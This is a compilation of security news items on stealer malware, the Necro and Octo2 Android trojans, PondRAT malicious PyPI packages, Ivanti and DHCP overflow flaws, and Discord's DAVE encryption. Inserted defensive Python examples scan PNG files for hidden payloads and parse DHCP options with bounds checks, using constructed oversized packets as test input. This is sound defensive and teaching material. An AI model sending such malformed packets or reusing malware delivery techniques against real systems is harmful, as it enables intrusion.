The disclosure comes amid the emergence of various stealer malware strains such as Angry Stealer, BLX Stealer (aka XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a CryptBot-related variant dubbed Yet Another Silly Stealer (YASS).
It also follows the emergence of a new version of the RomCom RAT, a successor to PEAPOD (aka RomCom 4.0) codenamed SnipBot that's distributed via bogus links embedded within phishing emails. Some aspects of the campaign were previously highlighted by the Computer Emergency Response Team of Ukraine (CERT-UA) in July 2024.
"SnipBot gives the attacker the ability to execute commands and download additional modules onto a victim's system," Palo Alto Networks Unit 42 researchers Yaron Samuel and Dominik Reichel said.
"The initial payload is always either an executable downloader masked as a PDF file or an actual PDF file sent to the victim in an email that leads to an executable."
While systems infected with RomCom have also witnessed ransomware deployments in the past, the cybersecurity company pointed out the absence of this behavior, raising the possibility that the threat behind the malware, Tropical Scorpius (aka Void Rabisu), has shifted from pure financial gain to espionage.
CISA Flags Critical Ivanti vTM Vulnerability Amid Active Exploitation Concerns
25.9.24 Vulnerability The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting Ivanti Virtual Traffic Manager (vTM) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The vulnerability in question is CVE-2024-7593 (CVSS score: 9.8), which could be exploited by a remote unauthenticated attacker to bypass the authentication of the admin panel and create rogue administrative users.
"Ivanti Virtual Traffic Manager contains an authentication bypass vulnerability that allows a remote, unauthenticated attacker to create a chosen administrator account," CISA said.
The issue was patched by Ivanti in vTM versions 22.2R1, 22.3R3, 22.5R2, 22.6R2, and 22.7R2 in August 2024.
The agency did not reveal any specifics on how the shortcoming is being weaponized in real-world attacks and who may be behind them, but Ivanti had previously noted that a proof-of-concept (PoC) is publicly available.
In light of the latest development, Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified flaw by October 15, 2024, to secure their networks.
In recent months, several flaws affecting Ivanti devices have come under active exploitation in the wild, including CVE-2024-8190 and CVE-2024-8963.
The software services provider acknowledged that it's aware of a "limited number of customers" who have been targeted by both the issues.
Data shared by Censys shows that there are 2,017 exposed Ivanti Cloud Service Appliance (CSA) instances online as of September 23, 2024, most of which are located in the U.S. It's currently not known how many of these are actually susceptible.
Necro Android Malware Found in Popular Camera and Browser Apps on Play Store
25.9.24 Virus The Hacker News
Altered versions of legitimate Android apps associated with Spotify, WhatsApp, and Minecraft have been used to deliver a new version of a known malware loader called Necro.
Kaspersky said some of the malicious apps have also been found on the Google Play Store. They have been cumulatively downloaded 11 million times. They include -
Wuta Camera - Nice Shot Always (com.benqu.wuta) - 10+ million downloads
Max Browser-Private & Security (com.max.browser) - 1+ million downloads
As of writing, Max Browser is no longer available for download from the Play Store. Wuta Camera, on the other hand, has been updated (version 6.3.7.138) to remove the malware. The latest version of the app, 6.3.8.148, was released on September 8, 2024.
It's currently not clear how both apps were compromised with the malware in the first place, although a rogue software development kit (SDK) for integrating advertising capabilities is believed to be the culprit.
Necro (not to be confused with a botnet of the same name) was first discovered by the Russian cybersecurity company in 2019 when it was hidden within a popular document scanning app called CamScanner.
CamScanner later blamed the issue on an advertisement SDK provided by a third-party named AdHub that it said contained a malicious module to retrieve next-stage malware from a remote server, essentially acting as a loader for all kinds of malware onto victim devices.
The new version of the malware is no different, although it packs in obfuscation techniques to evade detection, particularly leveraging steganography to hide payloads.
"The downloaded payloads, among other things, could display ads in invisible windows and interact with them, download and execute arbitrary DEX files, install applications it downloaded," Kaspersky researcher Dmitry Kalinin said.
It can also "open arbitrary links in invisible WebView windows and execute any JavaScript code in those, run a tunnel through the victim's device, and potentially subscribe to paid services."
One of the prominent delivery vehicles for Necro is modded versions of popular apps and games that are hosted on unofficial sites and app stores. Once downloaded, the apps initialize a module named Coral SDK, which, in turn, sends an HTTP POST request to a remote server.
The server subsequently responds with a link to a purported PNG image file hosted on adoss.spinsok[.]com, following which the SDK proceeds to extract the main payload – a Base64-encoded Java archive (JAR) file – from it.
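Kaspersky's write-up says the payload is carved out of a file that merely claims to be a PNG; the page does not say where inside the image it is stored. The script below is an added example (not Kaspersky's code and not Necro's extraction routine) of the static check a reviewer can run on image assets an SDK fetches: it walks the PNG chunk structure, verifies chunk CRCs, reports any bytes after the IEND chunk and any unusually large non-standard chunk, and tests whether trailing data Base64-decodes to a ZIP/JAR archive. The 1x1 PNG and the fake JAR bytes are constructed here as sample input; which of these hiding places a given loader uses is an assumption the heuristics cover, not a fact from the page.

```python
import base64
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_MAGIC = b"PK\x03\x04"  # a JAR is a ZIP archive
STANDARD_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"gAMA", b"cHRM", b"sRGB", b"iCCP",
    b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"pHYs", b"sBIT", b"sPLT", b"hIST", b"tIME",
}
LARGE_CHUNK = 1024  # bytes; above this an unknown chunk is worth a look


def _chunk(ctype: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png_1x1() -> bytes:
    """A minimal valid 1x1 RGB PNG, constructed as sample input."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, truecolour
    scanline = b"\x00" + b"\x00\x00\x00"                 # filter byte + one pixel
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline)) + _chunk(b"IEND", b""))


def walk_chunks(png: bytes):
    """Return (chunks, end_offset); each chunk is (type, data, crc_ok). Stops at IEND."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIG), []
    while pos + 8 <= len(png):
        length = struct.unpack(">I", png[pos:pos + 4])[0]
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        crc = png[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc) < 4:
            break  # truncated chunk
        crc_ok = struct.unpack(">I", crc)[0] == (zlib.crc32(ctype + data) & 0xFFFFFFFF)
        chunks.append((ctype, data, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, pos


def _decodes_to_zip(blob: bytes) -> bool:
    try:
        decoded = base64.b64decode(blob.strip(), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return decoded.startswith(ZIP_MAGIC)


def analyze_png(png: bytes) -> dict:
    """Static checks for a payload hidden in a PNG container."""
    chunks, end = walk_chunks(png)
    trailing = png[end:]
    findings = []
    if not any(c[0] == b"IEND" for c in chunks):
        findings.append("no IEND chunk (truncated or not really a PNG)")
    if any(not c[2] for c in chunks):
        findings.append("chunk CRC mismatch")
    for ctype, data, _ in chunks:
        if ctype not in STANDARD_CHUNKS and len(data) > LARGE_CHUNK:
            findings.append(f"large non-standard chunk {ctype.decode('latin-1')} ({len(data)} bytes)")
    if trailing:
        findings.append(f"{len(trailing)} bytes after IEND")
        if _decodes_to_zip(trailing):
            findings.append("trailing data Base64-decodes to a ZIP/JAR archive")
    return {
        "chunks": [c[0].decode("latin-1") for c in chunks],
        "trailing_bytes": len(trailing),
        "findings": findings,
    }


# Constructed sample: a clean PNG with a Base64-encoded fake JAR appended after IEND.
FAKE_JAR = ZIP_MAGIC + b"constructed placeholder, not a real archive"
SUSPICIOUS_PNG = build_png_1x1() + base64.b64encode(FAKE_JAR)

if __name__ == "__main__":
    print(analyze_png(build_png_1x1()))
    print(analyze_png(SUSPICIOUS_PNG))
```

An image decoder ignores everything after IEND, which is why appended data survives ordinary use of the file; a payload stored inside a valid chunk or in pixel data passes this check, so treat an empty findings list as "nothing obvious", not as a clean bill.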
Necro's malicious functions are realized through a set of additional modules (aka plugins) that are downloaded from the command-and-control (C2) server, allowing it to perform a wide range of actions on the infected Android device -
NProxy - Create a tunnel through the victim's device
island - Generate a pseudo-random number that's used as a time interval (in milliseconds) between displays of intrusive ads
web - Periodically contact a C2 server and execute arbitrary code with elevated permissions when loading specific links
Cube SDK - A helper module that loads other plugins to handle ads in the background
Tap - Download arbitrary JavaScript code and a WebView interface from the C2 server that are responsible for covertly loading and viewing ads
Happy SDK/Jar SDK - A module that combines NProxy and web modules with some minor differences
The discovery of Happy SDK has raised the possibility that the threat actors behind the campaign are experimenting with a non-modular version as well.
"This suggests that Necro is highly adaptable and can download different iterations of itself, perhaps to introduce new features," Kalinin said.
Telemetry data gathered by Kaspersky shows that it blocked over ten thousand Necro attacks worldwide between August 26 and September 15, 2024, with Russia, Brazil, Vietnam, Ecuador, Mexico, Taiwan, Spain, Malaysia, Italy, and Turkey accounting for the largest number of attacks.
"This new version is a multi-stage loader that used steganography to hide the second-stage payload, a very rare technique for mobile malware, as well as obfuscation to evade detection," Kalinin said.
"The modular architecture gives the Trojan's creators a wide range of options for both mass and targeted delivery of loader updates or new malicious modules depending on the infected application."
U.S. Proposes Ban on Connected Vehicles Using Chinese and Russian Tech
24.9.24 BigBrothers The Hacker News
The U.S. Department of Commerce (DoC) said it's proposing a ban on the import or sale of connected vehicles that integrate software and hardware made by foreign adversaries, particularly that of the People's Republic of China (PRC) and Russia.
"The proposed rule focuses on hardware and software integrated into the Vehicle Connectivity System (VCS) and software integrated into the Automated Driving System (ADS)," the Bureau of Industry and Security (BIS) said in a press statement.
"These are the critical systems that, through specific hardware and software, allow for external connectivity and autonomous driving capabilities in connected vehicles."
The agency said nefarious access to such systems could enable adversaries to harvest sensitive data and remotely manipulate cars on American roads.
The proposal extends to all wheeled on-road vehicles such as cars, trucks, and buses. Agricultural and mining vehicles are not included.
The BIS said "certain technologies" from China and Russia pose "undue risk" to U.S. critical infrastructure, as well as those who rely on connected vehicles, leading to a potential scenario that could undermine the national security and privacy of U.S. citizens.
"This rule marks a critical step forward in protecting America's technology supply chains from foreign threats and ensures that connected vehicle technologies are secure from the potential exploitation of entities linked to the PRC and Russia," said Under Secretary of Commerce for Industry and Security Alan F. Estevez.
Pursuant to the ban, the import and sale of vehicles with certain VCS or ADS hardware or software with a nexus to China or Russia will be prohibited.
It also aims to block manufacturers with ties to the PRC or Russia from selling connected vehicles that incorporate VCS hardware or software or ADS software in the U.S., even if the vehicle was made in the country.
"The prohibitions on software would take effect for Model Year 2027 and the prohibitions on hardware would take effect for Model Year 2030, or January 1, 2029 for units without a model year," the BIS said.
In a coordinated statement, the White House said the step is a move to ensure that U.S. automotive supply chains are resilient and secure from foreign threats. It added the increasing connectivity of vehicles to U.S. digital networks creates an environment to gather and exploit sensitive information.
"Certain hardware and software in connected vehicles enable the capture of information about geographic areas or critical infrastructure, and present opportunities for malicious actors to disrupt the operations of infrastructure or the vehicles themselves," the White House also pointed out.
Kaspersky Exits U.S., Automatically Replaces Software With UltraAV, Raising Concerns
24.9.24 Security The Hacker News
Antivirus vendor Kaspersky has formally begun pulling back its offerings in the U.S., migrating existing users to UltraAV, effective September 19, 2024, ahead of its formal exit at the end of the month.
"Kaspersky antivirus customers received a software update facilitating the transition to UltraAV," the company said in a post announcing the move on September 21.
"This update ensured that users would not experience a gap in protection upon Kaspersky's exit from the market."
The Russian company, which was banned from selling its software in the U.S. due to national security concerns, said it "worked closely" with UltraAV to ensure that the standards of security and privacy were maintained after the switch.
However, some users who experienced the update have taken to Kaspersky's forums and Reddit, stating that Kaspersky's software was automatically deleted and replaced by UltraAV without any prior notice.
UltraAV, in an FAQ, said "all Kaspersky U.S. users with a valid email address associated with their accounts received email communication detailing the transition process" starting September 5.
However, the notice reportedly did not state explicitly that the software switch on user systems would be automatic.
"I was using Kaspersky, didn't realize they'd be shuffling us off to some rando [antivirus] in September," one user wrote in a post on Reddit. "Nearly had a heart attack when I started my PC today and found a program I didn't download."
A U.S. company, UltraAV is part of Pango Group, which also offers several other VPN apps like UltraVPN, OVPN, and VPN360. It touts more than 25 million active users across its brands, and over 650 million lifetime users.
New Octo2 Android Banking Trojan Emerges with Device Takeover Capabilities
24.9.24 Virus The Hacker News
Cybersecurity researchers have discovered a new version of an Android banking trojan called Octo that comes with improved capabilities to conduct device takeover (DTO) and perform fraudulent transactions.
The new version has been codenamed Octo2 by the malware author, Dutch security firm ThreatFabric said in a report shared with The Hacker News, adding that campaigns distributing the malware have been spotted in European countries such as Italy, Poland, Moldova, and Hungary.
"The malware developers took actions to increase the stability of the remote actions capabilities needed for Device Takeover attacks," the company said.
Some of the malicious apps containing Octo2 are listed below -
Europe Enterprise (com.xsusb_restore3)
Google Chrome (com.havirtual06numberresources)
NordVPN (com.handedfastee5)
Octo was first flagged by the company in early 2022, when it described the malware as the work of a threat actor who goes by the online aliases Architect and goodluck. It has been assessed to be a "direct descendant" of the Exobot malware originally detected in 2016, which also spawned another variant dubbed Coper in 2021.
"Based on the source code of the banking Trojan Marcher, Exobot was maintained until 2018 targeting financial institutions with a variety of campaigns focused on Turkey, France and Germany as well as Australia, Thailand and Japan," ThreatFabric noted at the time.
"Subsequently, a 'lite' version of it was introduced, named ExobotCompact by its author, the threat actor known as 'android' on dark-web forums."
The emergence of Octo2 is said to have been primarily driven by the leak of the Octo source code earlier this year, leading other threat actors to spawn multiple variants of the malware.
Another major development is Octo's transition to a malware-as-a-service (MaaS) operation, per Team Cymru, enabling the developer to monetize the malware by offering it to cybercriminals who are looking to carry out information theft operations.
"When promoting the update, the owner of Octo announced that Octo2 will be available for users of Octo1 at the same price with early access," ThreatFabric said. "We can expect that the actors that were operating Octo1 will switch to Octo2, thus bringing it to the global threat landscape."
One of the significant improvements in Octo2 is the introduction of a Domain Generation Algorithm (DGA) to create the command-and-control (C2) server name, alongside improvements to its overall stability and anti-analysis techniques.
The rogue Android apps distributing the malware are created using a known APK binding service called Zombinder, which makes it possible to trojanize legitimate applications such that they retrieve the actual malware (in this case, Octo2) under the guise of installing a "necessary plugin."
"With the original Octo malware's source code already leaked and easily accessible to various threat actors, Octo2 builds on this foundation with even more robust remote access capabilities and sophisticated obfuscation techniques," ThreatFabric said.
"This variant's ability to invisibly perform on-device fraud and intercept sensitive data, coupled with the ease with which it can be customized by different threat actors, raises the stakes for mobile banking users globally."
Telegram Agrees to Share User Data With Authorities for Criminal Investigations
24.9.24 Social The Hacker News
In a major policy reversal, the popular messaging app Telegram has announced it will give users' IP addresses and phone numbers to authorities in response to valid legal requests in an attempt to rein in criminal activity on the platform.
"We've made it clear that the IP addresses and phone numbers of those who violate our rules can be disclosed to relevant authorities in response to valid legal requests," Telegram CEO Pavel Durov said in a post.
To that end, the company now explicitly states -
"If Telegram receives a valid order from the relevant judicial authorities that confirms you're a suspect in a case involving criminal activities that violate the Telegram Terms of Service, we will perform a legal analysis of the request and may disclose your IP address and phone number to the relevant authorities."
Such data disclosures, it said, will be included in its periodic transparency reports. It further noted that the service may collect metadata such as IP address, devices and Telegram apps used, and the history of username changes to tackle spam, abuse, and other violations.
It's worth noting that a previous version of its policy limited user information sharing to cases involving terror suspects: "If Telegram receives a court order that confirms you're a terror suspect, we may disclose your IP address and phone number to the relevant authorities."
Accompanying the changes is an update to its search feature to remove problematic content from search results and a new mechanism for users to report illegal search terms and material through the @SearchReport bot for subsequent review and removal by a human moderation team.
The update to Telegram's Terms of Service and Privacy Policy is a major volte-face for the company, which has refused to police the platform for years, turning it into a major haven for cybercrime and other illegal activities, including drug trafficking, child pornography, and money laundering.
The changes have also been driven by the arrest of Durov in France over allegations that the company turned a blind eye to various crimes flourishing unchecked on the platform. He was subsequently released on bail but has been ordered to stay in the country pending ongoing investigation.
Last week, the Ukrainian government said it was banning the use of Telegram by government officials, military personnel, and other defense and critical infrastructure workers, citing national security concerns.
Critical Flaw in Microchip ASF Exposes IoT Devices to Remote Code Execution Risk
23.9.24 IoT The Hacker News
A critical security flaw has been disclosed in the Microchip Advanced Software Framework (ASF) that, if successfully exploited, could lead to remote code execution.
The vulnerability, tracked as CVE-2024-7490, carries a CVSS score of 9.5 out of a maximum of 10.0. It has been described as a stack-based overflow vulnerability in ASF's implementation of the tinydhcp server stemming from a lack of adequate input validation.
"There exists a vulnerability in all publicly available examples of the ASF codebase that allows for a specially crafted DHCP request to cause a stack-based overflow that could lead to remote code execution," CERT Coordination Center (CERT/CC) said in an advisory.
Given that the software is no longer supported and is rooted in IoT-centric code, CERT/CC has warned that the vulnerability is "likely to surface in many places in the wild."
The issue impacts ASF 3.52.0.2574 and all prior versions of the software, with the agency also noting that multiple forks of the tinydhcp software are likely susceptible to the flaw as well.
There are currently no fixes or mitigations to address CVE-2024-7490, barring replacing the tinydhcp service with another one that does not have the same issue.
The development comes as SonicWall Capture Labs detailed a severe zero-click vulnerability affecting MediaTek Wi-Fi chipsets (CVE-2024-20017, CVSS 9.8) that could open the door to remote code execution without requiring any user interaction due to an out-of-bounds write issue.
"The affected versions include MediaTek SDK versions 7.4.0.1 and earlier, as well as OpenWrt 19.07 and 21.02," the company said. "This translates to a large variety of vulnerable devices, including routers and smartphones."
"The vulnerability is a buffer overflow as a result of a length value taken directly from attacker-controlled packet data without bounds checking and placed into a memory copy. This buffer overflow creates an out-of-bounds write."
A patch for the vulnerability was released by MediaTek in March 2024, although the likelihood of exploitation has increased with the public availability of a proof-of-concept (PoC) exploit as of August 30, 2024.
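Both flaws above come down to the same missing check: a length field taken from the packet is trusted before it is compared against what is actually left in the buffer, and the copy that follows runs past a fixed-size destination. The following Python parser is an added example (not ASF, tinydhcp or MediaTek code) of how a DHCP options decoder bounds every read by the bytes remaining and refuses to copy a value into a buffer it does not fit. The packet bytes are constructed inline; the 64-byte hostname buffer stands in for the fixed-size stack buffer a C server would declare and is an assumption for illustration.

```python
import struct

FIXED_HEADER_LEN = 236                 # op through file fields, RFC 2131 section 2
MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_END = 0, 255
OPT_HOSTNAME, OPT_MSG_TYPE, OPT_PARAM_REQUEST = 12, 53, 55
HOSTNAME_BUF = 64                      # assumed fixed-size destination (e.g. char name[64] on the stack)


class MalformedDhcp(ValueError):
    """Raised instead of reading or writing past a buffer."""


def parse_dhcp_options(packet: bytes) -> dict:
    """Decode the TLV option area, bounding every read by the packet length.

    The length byte of each option comes from the sender; trusting it without
    comparing it to the bytes remaining is the defect class described above.
    """
    if len(packet) < FIXED_HEADER_LEN + 4:
        raise MalformedDhcp("packet shorter than the fixed header plus magic cookie")
    if packet[FIXED_HEADER_LEN:FIXED_HEADER_LEN + 4] != MAGIC_COOKIE:
        raise MalformedDhcp("missing DHCP magic cookie")
    pos, options = FIXED_HEADER_LEN + 4, {}
    while pos < len(packet):
        code = packet[pos]
        if code == OPT_PAD:
            pos += 1
            continue
        if code == OPT_END:
            return options
        if pos + 2 > len(packet):
            raise MalformedDhcp(f"option {code} has no length byte")
        length = packet[pos + 1]
        remaining = len(packet) - (pos + 2)
        if length > remaining:  # the check the vulnerable parsers skip
            raise MalformedDhcp(f"option {code} declares {length} bytes, only {remaining} remain")
        value = packet[pos + 2:pos + 2 + length]
        options[code] = options.get(code, b"") + value  # RFC 3396: repeated options concatenate
        pos += 2 + length
    raise MalformedDhcp("option area ended without an END option")


def extract_hostname(options: dict, buf_size: int = HOSTNAME_BUF) -> bytes:
    """Copy option 12 into a fixed-size buffer only if it fits with a terminator."""
    name = options.get(OPT_HOSTNAME, b"")
    if len(name) >= buf_size:
        raise MalformedDhcp(f"hostname of {len(name)} bytes does not fit a {buf_size}-byte buffer")
    buf = bytearray(buf_size)          # stands in for the C stack buffer
    buf[:len(name)] = name
    return bytes(buf[:len(name)])


def is_malformed(packet: bytes) -> bool:
    """True if the packet would have been rejected somewhere in the checked path."""
    try:
        extract_hostname(parse_dhcp_options(packet))
        return False
    except MalformedDhcp:
        return True


def build_dhcp(options: bytes, xid: int = 0x3903F326) -> bytes:
    """Constructed BOOTREQUEST with a mostly zeroed header and the given option bytes."""
    chaddr = b"\x02\x00\x00\x00\x00\x01"
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                         1, 1, 6, 0, xid, 0, 0x8000,
                         b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,
                         chaddr, b"", b"")
    return header + MAGIC_COOKIE + options


# Constructed samples: a valid DISCOVER, a length byte larger than the packet, and a
# complete but oversized hostname.
GOOD = build_dhcp(b"\x35\x01\x01" + b"\x0c\x08lab-host" + b"\x37\x03\x01\x03\x06" + b"\xff")
TRUNCATED = build_dhcp(b"\x35\x01\x01" + b"\x0c\xc8" + b"A" * 8)              # claims 200 bytes, has 8
OVERSIZED = build_dhcp(b"\x35\x01\x01" + b"\x0c\xc8" + b"A" * 200 + b"\xff")  # 200 bytes, buffer is 64

if __name__ == "__main__":
    print(parse_dhcp_options(GOOD))
    for name, pkt in (("good", GOOD), ("truncated", TRUNCATED), ("oversized", OVERSIZED)):
        print(name, "malformed" if is_malformed(pkt) else "ok")
```

The two checks are deliberately separate: the first (length versus bytes remaining) prevents an out-of-bounds read of the packet, the second (value versus destination size) prevents the out-of-bounds write that the MediaTek advisory describes. A parser that has only one of them is still exploitable through the other.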
Discord Introduces DAVE Protocol for End-to-End Encryption in Audio and Video Calls
23.9.24 Safety The Hacker News
Popular social messaging platform Discord has announced that it's rolling out a new custom end-to-end encrypted (E2EE) protocol to secure audio and video calls.
The protocol has been dubbed DAVE, short for Discord's audio and video end-to-end encryption ("E2EE A/V").
As part of the change introduced last week, voice and video in DMs, Group DMs, voice channels, and Go Live streams are expected to be migrated to use DAVE.
That said, it's worth noting that messages on Discord will remain unencrypted and are subject to its content moderation approach.
"When we consider adding new privacy features like E2EE A/V, we do not do so in isolation from safety," Discord said. "That is why safety is integrated across our product and policies, and why messages on Discord are unencrypted."
"Messages will still be subject to our content moderation approach, allowing us to continue offering additional safety protections."
DAVE is publicly auditable and has been reviewed by Trail of Bits, with the protocol leveraging WebRTC encoded transforms and Message Layer Security (MLS) for encryption and group key exchange (GKE), respectively.
This allows for media frames, outside of the codec metadata, to be encrypted after they are encoded and decrypted before being decoded on the receiver side.
"Each frame is encrypted or decrypted with a per-sender symmetric key," Discord said. "This key is known to all participants of the audio and video session but crucially is unknown to any outsider who is not a member of the call, including Discord."
The use of MLS, on the other hand, makes it possible for users to join or leave a voice or video session on Discord in such a way that new participants cannot decrypt media sent before they joined, and departed members cannot decrypt any media sent after they leave.
"Discord's existing transport encryption for audio and video between the client and our selective forwarding unit (SFU) is retained, ensuring only audio and video from authenticated call participants is forwarded," it noted.
"While the SFU still processes all packets for the call, audio or video data inside each packet is end-to-end encrypted and undecryptable by the SFU."
The development comes days after the GSM Association (GSMA), the governing body that oversees the development of the Rich Communications Services (RCS) protocol, said it's working towards implementing E2EE to secure messages sent between the Android and iOS ecosystems.
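The properties Discord describes for DAVE (a per-sender key that every call member can derive but no outsider can, codec metadata left readable so the SFU can still forward packets, and a rekey on every join or leave so newcomers cannot read the past and leavers cannot read the future) can be modelled in a short script. The code below is an added example, not DAVE's or Discord's implementation: it uses an HMAC-SHA256 keystream and tag as a stand-in for the real AEAD cipher and MLS key schedule, refreshes an epoch secret on each membership change, derives per-sender keys from that secret, and authenticates the frame header without encrypting it. Member names, the header bytes and the media payloads are constructed for the example.

```python
import hashlib
import hmac
import os
import struct

TAG_LEN = 16


def derive(secret: bytes, label: bytes) -> bytes:
    """HMAC-SHA256 derivation, an assumed stand-in for the MLS key schedule."""
    return hmac.new(secret, label, hashlib.sha256).digest()


class CallGroup:
    """Epoch secrets as MLS hands them out in outline: every join or leave starts
    a new epoch whose secret only the members present at that moment receive."""

    def __init__(self, members):
        self.epoch = 0
        self.members = set(members)
        self.secret = os.urandom(32)
        self.known = {}      # member -> {epoch: epoch secret}; models each client's key store
        self.counters = {}   # sender -> frame counter, so a nonce never repeats under one key
        self._distribute()

    def _distribute(self):
        for m in self.members:
            self.known.setdefault(m, {})[self.epoch] = self.secret

    def _rekey(self):
        # Fresh entropy goes into each new epoch, so holding an old secret
        # does not let a departed member compute the next one.
        self.epoch += 1
        self.secret = derive(self.secret, b"commit|" + os.urandom(32))
        self._distribute()

    def join(self, member):
        self.members.add(member)
        self._rekey()

    def leave(self, member):
        self.members.discard(member)
        self._rekey()


def sender_key(epoch_secret: bytes, sender: str) -> bytes:
    """Per-sender symmetric key; all members can derive it, outsiders cannot."""
    return derive(epoch_secret, b"sender|" + sender.encode())


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out, block = b"", 0
    while len(out) < n:
        out += hmac.new(key, nonce + struct.pack(">I", block), hashlib.sha256).digest()
        block += 1
    return out[:n]


def encrypt_frame(group: CallGroup, sender: str, header: bytes, media: bytes) -> bytes:
    """Encrypt one encoded frame; the codec header stays in the clear but is authenticated."""
    if sender not in group.members:
        raise PermissionError(f"{sender} is not in the call")
    key = sender_key(group.secret, sender)
    ctr = group.counters.get(sender, 0)
    group.counters[sender] = ctr + 1
    prefix = struct.pack(">BHQ", len(header), group.epoch, ctr)
    ct = bytes(a ^ b for a, b in zip(media, _keystream(key, struct.pack(">Q", ctr), len(media))))
    tag = hmac.new(key, prefix + header + ct, hashlib.sha256).digest()[:TAG_LEN]
    return prefix + header + ct + tag


def decrypt_frame(group: CallGroup, receiver: str, sender: str, packet: bytes):
    """Return (header, media); media is None if receiver lacks the epoch key or the tag fails."""
    hlen, epoch, ctr = struct.unpack(">BHQ", packet[:11])
    header = packet[11:11 + hlen]
    ct, tag = packet[11 + hlen:-TAG_LEN], packet[-TAG_LEN:]
    epoch_secret = group.known.get(receiver, {}).get(epoch)
    if epoch_secret is None:
        return header, None          # metadata readable (what an SFU sees), media not
    key = sender_key(epoch_secret, sender)
    expected = hmac.new(key, packet[:11 + hlen] + ct, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(expected, tag):
        return header, None
    return header, bytes(a ^ b for a, b in zip(ct, _keystream(key, struct.pack(">Q", ctr), len(ct))))


def run_scenario() -> dict:
    """Constructed call: alice and bob start, carol joins, bob leaves."""
    g = CallGroup(["alice", "bob"])
    hdr = b"\x90\x60"                      # constructed stand-in for codec metadata
    f0 = encrypt_frame(g, "alice", hdr, b"epoch0 audio")
    g.join("carol")                        # epoch 1
    f1 = encrypt_frame(g, "alice", hdr, b"epoch1 audio")
    g.leave("bob")                         # epoch 2
    f2 = encrypt_frame(g, "alice", hdr, b"epoch2 audio")
    tampered = f2[:-1] + bytes([f2[-1] ^ 1])
    return {
        "bob_reads_epoch0": decrypt_frame(g, "bob", "alice", f0)[1] == b"epoch0 audio",
        "carol_reads_epoch0": decrypt_frame(g, "carol", "alice", f0)[1] == b"epoch0 audio",
        "carol_reads_epoch1": decrypt_frame(g, "carol", "alice", f1)[1] == b"epoch1 audio",
        "bob_reads_epoch2": decrypt_frame(g, "bob", "alice", f2)[1] == b"epoch2 audio",
        "sfu_sees_header": decrypt_frame(g, "sfu", "alice", f2)[0] == hdr,
        "sfu_reads_media": decrypt_frame(g, "sfu", "alice", f2)[1] is not None,
        "tamper_rejected": decrypt_frame(g, "carol", "alice", tampered)[1] is None,
    }


if __name__ == "__main__":
    for k, v in run_scenario().items():
        print(f"{k}: {v}")
```

The `sfu` participant never appears in the group, so it can parse the header (what a forwarding unit needs for routing) but gets `None` for media, matching the statement that packet contents are undecryptable by the SFU; a real deployment would replace the HMAC construction with an AEAD and take epoch secrets from an actual MLS group rather than this in-process model.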
New PondRAT Malware Hidden in Python Packages Targets Software Developers
23.9.24 Virus The Hacker News
Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign.
PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in attacks related to the 3CX supply chain compromise last year.
Some of these attacks are part of a persistent cyber attack campaign dubbed Operation Dream Job, wherein prospective targets are lured with enticing job offers in an attempt to trick them into downloading malware.
"The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular repository of open-source Python packages," Unit 42 researcher Yoav Zemah said, linking the activity with moderate confidence to a threat actor called Gleaming Pisces.
The adversary is also tracked by the wider cybersecurity community under the names Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736, a sub-cluster within the Lazarus Group that's also known for distributing the AppleJeus malware.
It's believed that the end goal of the attacks is to "secure access to supply chain vendors through developers' endpoints and subsequently gain access to the vendors' customers' endpoints, as observed in previous incidents."
The list of malicious packages, now removed from the PyPI repository, is below -
real-ids (893 downloads)
coloredtxt (381 downloads)
beautifultext (736 downloads)
minisound (416 downloads)
The infection chain is fairly simple: once downloaded and installed on developer systems, the packages execute an encoded next-stage payload that, in turn, retrieves the Linux and macOS versions of the RAT from a remote server and runs them.
Further analysis of PondRAT has revealed similarities with both POOLRAT and AppleJeus, with the attacks also distributing new Linux variants of POOLRAT.
"The Linux and macOS versions [of POOLRAT] use an identical function structure for loading their configurations, featuring similar method names and functionality," Zemah said.
"Additionally, the method names in both variants are strikingly similar, and the strings are almost identical. Lastly, the mechanism that handles commands from the [command-and-control server] is nearly identical."
PondRAT, a leaner version of POOLRAT, comes with capabilities to upload and download files, pause operations for a predefined time interval, and execute arbitrary commands.
"The evidence of additional Linux variants of POOLRAT showed that Gleaming Pisces has been enhancing its capabilities across both Linux and macOS platforms," Unit 42 said.
"The weaponization of legitimate-looking Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can result in malware infection that compromises an entire network."
The disclosure comes as KnowBe4, which was duped into hiring a North Korean threat actor as an employee, said more than a dozen companies "either hired North Korean employees or had been besieged by a multitude of fake resumes and applications submitted by North Koreans hoping to get a job with their organization."
